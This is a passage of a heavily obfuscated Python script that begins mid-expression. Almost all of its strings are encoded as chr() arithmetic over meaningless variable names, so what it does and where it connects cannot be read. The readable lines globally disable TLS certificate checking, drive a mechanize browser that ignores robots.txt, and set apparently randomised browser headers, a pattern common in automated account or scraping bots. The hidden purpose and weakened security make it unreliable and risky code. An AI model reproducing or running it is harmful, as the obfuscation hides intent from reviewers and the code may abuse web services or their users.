cu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvc
f),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf)]));__________xduwwhhvdkdk=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));___________safwypzdtyrq=str("".join(chr(__RSV) for __RSV in 
[(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));____________gwomkbigouww=str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpz
wvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__af
lplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_____________wyuikauitlcd=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));______________tcymyqjxmzbf=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_______________ycxcbtahqqol=str("".join(chr(__RSV) for __RSV in 
[(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));________________pixvrolmaans=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_________________nmgndmxrvojz=str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));__________________ogahvizyezgh=str("".join(chr(__RSV) for __RSV 
in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));___________________ybrnoreldtvh=str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));____________________cfvibdwzmykv=str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_____________________hbbwsuiavbgt=str("".join(chr(__RSV) for __RSV in [(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<___
_fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));______________________aowndogywtha=str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+____fsramejesdme+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_
hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]))
def _______________________dosypamcpfti(________________________czrkpslclact,_________________________xopyuxqnuyqk):
__________________________bqruohfppisx=random_Fox((___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))))+str("".join(chr(__RSV) for __RSV in [((__aflplkezjikd<<__aflplkezjikd)+(___yxzqdtmchnrw<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(____fsramejesdme<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(_____tajgegigotbw<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+(((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(______mwfdcrswdvcf<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]))
ssl._create_default_https_context = ssl._create_unverified_context
try :
br=mechanize.Browser()
br.set_handle_equiv((()==()))
br.set_handle_redirect((()==()))
br.set_handle_referer((()==()))
br.set_handle_robots((()==[]))
br.addheaders=[(str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])),str("".join(chr(__RSV) for __RSV in 
[((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu*
*_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtm